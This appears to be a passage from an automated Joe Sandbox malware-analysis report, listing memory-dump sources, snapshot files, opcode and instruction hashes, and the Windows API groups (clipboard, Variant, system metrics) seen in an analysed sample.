                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                    • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                    • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                    • Instruction ID: 36e37f5184ae6b5f12f1d3ae35ca6bd396f784eb5bf305c7c25848572748988b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F06DB5E0C3808BC718CF28C44066AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                    • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                    • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                    • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                    • Instruction ID: 1209ac60c52be1ee3d2609d382f462b43dac307b6badfe25585f3bede4718c51
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61418E7050C7818FD341AF7C988836FBEE09F86314F084A7EE4DA86392D6788549C797
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                    • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                    • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                    • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                    • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                    • String ID: L
                                                                                                                                                                                                                                                                    • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                    • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction ID: 3ad9b868c03ac49d6ff77bb70abfbb19bf88551a758c6b1064517cd83c371392
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF412B7110CBC18ED321DB38845869EBFD16FE6220F188A9DE5F5873E2D674854ACB53
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                    • String ID: L
                                                                                                                                                                                                                                                                    • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                    • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                    • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                    • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86